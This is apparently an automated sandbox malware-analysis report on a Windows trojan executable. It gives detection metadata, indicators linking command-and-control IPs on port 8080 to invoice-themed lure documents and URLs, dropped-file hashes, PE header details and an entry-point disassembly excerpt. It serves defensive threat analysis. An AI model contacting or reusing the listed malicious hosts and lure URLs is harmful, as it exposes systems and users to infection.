                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:29
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.evad.winEXE@20/8@0/5
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 86.5% (good quality ratio 75.7%)
                                                                                      • Quality average: 76.2%
                                                                                      • Quality standard deviation: 33.6%
                                                                                      HCA Information:Failed
                                                                                      Cookbook Comments:
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI
                                                                                      Warnings:
                                                                                      Show All
                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.193.48, 92.122.145.220, 40.88.32.150, 13.88.21.125, 20.82.210.154, 23.218.208.56, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 20.54.26.129
                                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      01:04:48API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                      01:06:03API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      193.169.54.12_01_.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      hEHN0WzBF.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      http://baseballpontedipiave.com/Sales-Invoice/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      emotet2.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      20180212-20_46_01_.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      SalesInvoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      SalesInvoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      mj03dyvx_2076767.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      RDuYHvb2jQ.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      http://okomekai.symphonic-net.com/Invoice-69070770/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      mail.rodolfogvalencia.com/Invoice/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12:8080/
                                                                                      173.230.145.224mj03dyvx_2076767.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      RDuYHvb2jQ.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      http://okomekai.symphonic-net.com/Invoice-69070770/Get hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      mail.rodolfogvalencia.com/Invoice/Get hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      74039.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Dokumente.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Dokumente.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      http://bri8pos.in/Outstanding-INVOICE-VKBH/2570051/445/Get hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      uSUbynSM4.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      nbtDJb.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      EmQ2Ard8g4.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Aj82OO6oKIHl4B.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      http://cinetiux.com/LLC/?newinvoice01.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/
                                                                                      Emotet119.docGet hashmaliciousBrowse
                                                                                      • 173.230.145.224:8080/

                                                                                      Domains

                                                                                      No context

                                                                                      ASN

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      ICFSYSTEMSDEsample.exe.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      yxghUyIGb4.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      0HvIGwMmBV.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      pitEBNziGR.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      _01_.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      hEHN0WzBF.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      http://baseballpontedipiave.com/Sales-Invoice/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      emotet2.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      20180212-20_46_01_.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/Get hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      SalesInvoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      SalesInvoice.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      mj03dyvx_2076767.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Scan1782384.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      RDuYHvb2jQ.exeGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 193.169.54.12
                                                                                      SZERVERNET-HU-ASHUsample.exe.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      yxghUyIGb4.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      0HvIGwMmBV.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      pitEBNziGR.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      https://kaliconsultancy.com/wp-content/uploads/2020/09/wflnfkqajn.phpGet hashmaliciousBrowse
                                                                                      • 79.172.193.55
                                                                                      https://delina.hu/praktikak/2016/02/01/csinalj-te-is-kreativ-mozaikkoveketGet hashmaliciousBrowse
                                                                                      • 95.140.36.82
                                                                                      762002910000000.exeGet hashmaliciousBrowse
                                                                                      • 79.172.193.32
                                                                                      1Wire_Copy.exeGet hashmaliciousBrowse
                                                                                      • 79.172.242.87
                                                                                      430#U0437.jsGet hashmaliciousBrowse
                                                                                      • 79.172.193.32
                                                                                      59Transfer-copy.exeGet hashmaliciousBrowse
                                                                                      • 79.172.242.92
                                                                                      25wire_slip.exeGet hashmaliciousBrowse
                                                                                      • 79.172.242.89
                                                                                      BK.485799485.jseGet hashmaliciousBrowse
                                                                                      • 79.172.193.32
                                                                                      PO 2312 CBD- 1302 S18.docGet hashmaliciousBrowse
                                                                                      • 79.172.242.87
                                                                                      RDuYHvb2jQ.exeGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Outstanding Invoices.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      http://okomekai.symphonic-net.com/Invoice-69070770/Get hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Outstanding invoice.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      Informationen #018612525.docGet hashmaliciousBrowse
                                                                                      • 79.172.249.82
                                                                                      LINODE-APLinodeLLCUSPrivate doc.docmGet hashmaliciousBrowse
                                                                                      • 212.71.251.238
                                                                                      invoice_document.docmGet hashmaliciousBrowse
                                                                                      • 212.71.251.238
                                                                                      sample.exe.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224
                                                                                      Document_Opener.exe.14.exeGet hashmaliciousBrowse
                                                                                      • 88.80.186.210
                                                                                      Audio playback (7656) for joew Camrosa.htmGet hashmaliciousBrowse
                                                                                      • 192.81.132.201
                                                                                      Paymonth invoice.exeGet hashmaliciousBrowse
                                                                                      • 45.79.19.196
                                                                                      PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                                                                      • 45.79.175.190
                                                                                      FB11.exeGet hashmaliciousBrowse
                                                                                      • 172.105.116.135
                                                                                      salescontractv2draft.exeGet hashmaliciousBrowse
                                                                                      • 45.56.127.45
                                                                                      yxghUyIGb4.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224
                                                                                      TaTYytHaBk.exeGet hashmaliciousBrowse
                                                                                      • 45.33.51.71
                                                                                      0HvIGwMmBV.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224
                                                                                      pitEBNziGR.exeGet hashmaliciousBrowse
                                                                                      • 173.230.145.224
                                                                                      aEdlObiYav.exeGet hashmaliciousBrowse
                                                                                      • 45.33.54.74
                                                                                      1m7388e48E.exeGet hashmaliciousBrowse
                                                                                      • 45.79.26.231
                                                                                      4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                                                                      • 45.79.19.196
                                                                                      SecuriteInfo.com.Trojan.Kronos.21.31435.exeGet hashmaliciousBrowse
                                                                                      • 139.162.210.252
                                                                                      Z8bln2YPEw.exeGet hashmaliciousBrowse
                                                                                      • 96.126.101.20
                                                                                      yxQWzvifFe.exeGet hashmaliciousBrowse
                                                                                      • 96.126.123.244
                                                                                      Purchase _Order-EndUer#99849959.Pdff.exeGet hashmaliciousBrowse
                                                                                      • 139.162.21.249

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4096
                                                                                      Entropy (8bit):0.5967038728698416
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:0Fuc0k1GaD0JOCEfMuaaD0JOCEfMKQmDAS1Al/gz2cE0fMbhEZolrRSQ2hyYIIT:0wc7GaD0JcaaD0JwQQAS1Ag/0bjSQJ
                                                                                      MD5:557EB5010357D1A9D8B69FF66BEC687C
                                                                                      SHA1:764181735B72D763A387FCAAAB027DC49E00E569
                                                                                      SHA-256:2E28A7E8B4A55DC24CEA579C3EA6DFB92218471230A8F8160EE26847868516CB
                                                                                      SHA-512:0DBE74078B89D9D28D1A0BF9351B0F71BDC80868CDF413480273E786041D0F58C5A09B60D41892862F71F2DF13C32A06633FFC314027D4288C8EE8930B0CE076
                                                                                      Malicious:false
                                                                                      Preview: ......:{..(.....0....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................0....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x544acddf, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.09645323079349617
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:lOkGzwl/+xVaRIE11Y8TRXK8wMVsKvOkGzwl/+xVaRIE11Y8TRXK8wMVsK:O0+xVaO4blKKsKU0+xVaO4blKKsK
                                                                                      MD5:5069A6622B33EC1DC47A5650DF987E58
                                                                                      SHA1:F443A69F7098B911C5887BBA86BD949566E90EDD
                                                                                      SHA-256:E92951CEAC0CC4A830A2A5649B494D1BED30F7C11B09CBD271CC6CD3E031080B
                                                                                      SHA-512:36D193C7CADE35811709DEA13E5F967454FD60947BEC861C5FB79A897147DE7768A3E793F5E053A31EA5B00C9C652E1B187E1CAC9FA3A4CAAA5B9FB155BC791D
                                                                                      Malicious:false
                                                                                      Preview: TJ..... ................e.f.3...w........................&..........w..0....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................O..|0....y.k................4F..0....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8192
                                                                                      Entropy (8bit):0.1106223166644607
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:22LEvVfWDjSXl/bJdAtiqV7WVwll:2bdWDj8t4TMVQ
                                                                                      MD5:2836D7643BFCE5ED2AA7B69CB91982CD
                                                                                      SHA1:47877650BF812E878E9AF8F24DF295212921216A
                                                                                      SHA-256:7FD1A92DAE29706C658A036195110E89B372DDA1CC71E881C2EFB96C271738FD
                                                                                      SHA-512:F214B46609C7A14653668A4DCC31576B0EE9D7AECD42F0C4B07CE626F61A00AEC6C47BBB5935E75985F6172C416279F147669C703C8BCC5349D293F4C62D1811
                                                                                      Malicious:false
                                                                                      Preview: .........................................3...w..0....y.......w...............w.......w....:O.....w..................4F..0....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11001861610408081
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:26sTXm/Ey6q9995J+lq3qQ10nMCldimE8eawHjcDP:26sKl6824LyMCldzE9BHjcDP
                                                                                      MD5:2B1D3EA84AD75DFE777EB1A8DE8C7399
                                                                                      SHA1:001A0DB4193F3B96D86E8D87F53C77894903ADE2
                                                                                      SHA-256:F23C6582708C997583FD771F9F9F99905AF86F621F4D42B56E13EF88D2E62DAC
                                                                                      SHA-512:6F33493FAA205A76E1F0D643BCA6C7DC7C9C608FF3CDCC16348FCF8BBFE7A6F8BA8417302A0298E6A2405BB1EB7D3F374C16639A8AEB6210BE8CA71B8D619692
                                                                                      Malicious:false
                                                                                      Preview: .........................................................................................K.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .........`(..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........JU......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11253865390259021
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:1Xm/Ey6q9995Jkz1miM3qQ10nMCldimE8eawHza1miIGl:Yl68cz1tMLyMCldzE9BHza1tIQ
                                                                                      MD5:7ADCAD211CDF2FD1CC8DA2A1791621CE
                                                                                      SHA1:75D204D950DB597D6C190855454FB4F85F8D4B5A
                                                                                      SHA-256:7AAD7EC6DC2F708F979C1BF507B707C9F31E74F6F848FA47D97B7C3BB5D83430
                                                                                      SHA-512:489E1F06B9B0A85ECBCB3DED6EB8FAAEFC1D449BAF93D5A1152BAF7E970A1BB8E13A2BDDE9767D431ACA5796A30C13E6DDEB805C34AC458DCE29557E150EB2F6
                                                                                      Malicious:false
                                                                                      Preview: ........................................................................................3........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .........`(..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11236779795229494
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bjXm/Ey6q9995JT/z1mK2P3qQ10nMCldimE8eawHza1mKhP:2l68zz1iPLyMCldzE9BHza1V
                                                                                      MD5:524406AD7E80D9C5BC5192B5E4BA2D33
                                                                                      SHA1:7E649F44A797517C0059D59A81A5A9AB56EE744D
                                                                                      SHA-256:8EB5A7410E9C16FC62FA6C86AE419E4C1381539E879BCC553E0AD3E065BBFB22
                                                                                      SHA-512:357F3AE3C291D71AC12A7D7CB1B1ABDCCB6313834F475009AAB1324DAE916EC774DE7DE33025125C2D4FE2987EFA95DD6A4DE3561ABB12A22E03654ED879FB4C
                                                                                      Malicious:false
                                                                                      Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .........`(..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):55
                                                                                      Entropy (8bit):4.306461250274409
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                      Malicious:false
                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):906
                                                                                      Entropy (8bit):3.146261445090396
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rZwZ0rRk9+MlWlLehB4yAq7ejC4wZ0rw:OaqdmuF3rKz+kWReH4yJ7MyZ
                                                                                      MD5:03776C83F89D95C41CC2CBE479A86768
                                                                                      SHA1:F1F1CB6A2F4C625FA8EF2F0CF333403AD8C03643
                                                                                      SHA-256:14491B3FDACC70C81B109E07706D4A6439E236C5445782A76456FB64F5788F2B
                                                                                      SHA-512:80928123142E0D534901B2DD5604A02C33D7E3BF8C507AB271BE77D409D005A1AE32B135D6922F57A7EC8FBD46032281959700B76D2BA3ED08541FF6C3D94EE2
                                                                                      Malicious:false
                                                                                      Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. A.p.r. .. 0.3. .. 2.0.2.1. .0.1.:.0.6.:.0.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. A.p.r. .. 0.3. .. 2.0.2.1. .0.1.:.0.6.:.0.3.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.436116781781946
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:9fdUNaHzLv.exe
                                                                                      File size:45568
                                                                                      MD5:ecbc4b40dcfec4ed1b2647b217da0441
                                                                                      SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
                                                                                      SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
                                                                                      SHA512:3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
                                                                                      SSDEEP:768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

                                                                                      File Icon

                                                                                      Icon Hash:00828e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x409ee0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:4cfe8bbfb0ca5b84bbad08b043ea0c87

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      push esi
                                                                                      push 0040C1F0h
                                                                                      push 3966646Ch
                                                                                      push 00000009h
                                                                                      mov ecx, D22E2014h
                                                                                      call 00007FB7BCCE900Eh
                                                                                      mov edx, 004011F0h
                                                                                      mov ecx, eax
                                                                                      call 00007FB7BCCE8F32h
                                                                                      add esp, 0Ch
                                                                                      mov ecx, 8F7EE672h
                                                                                      push 0040C0D0h
                                                                                      push 6677A1D2h
                                                                                      push 00000048h
                                                                                      call 00007FB7BCCE8FE9h
                                                                                      mov edx, 004010D0h
                                                                                      mov ecx, eax
                                                                                      call 00007FB7BCCE8F0Dh
                                                                                      add esp, 0Ch
                                                                                      push 08000000h
                                                                                      push 00000000h
                                                                                      call dword ptr [0040C1A8h]
                                                                                      push eax
                                                                                      call dword ptr [0040C10Ch]
                                                                                      mov esi, eax
                                                                                      test esi, esi
                                                                                      je 00007FB7BCCF1348h
                                                                                      push 08000000h
                                                                                      push 00000000h
                                                                                      push esi
                                                                                      call dword ptr [0040C1F8h]
                                                                                      add esp, 0Ch
                                                                                      push esi
                                                                                      push 00000000h
                                                                                      call dword ptr [0040C1A8h]
                                                                                      push eax
                                                                                      call dword ptr [0040C1E8h]
                                                                                      call 00007FB7BCCE896Ah
                                                                                      push 00000000h
                                                                                      call dword ptr [0040C1ACh]
                                                                                      pop esi
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0Ch
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      mov edi, edx
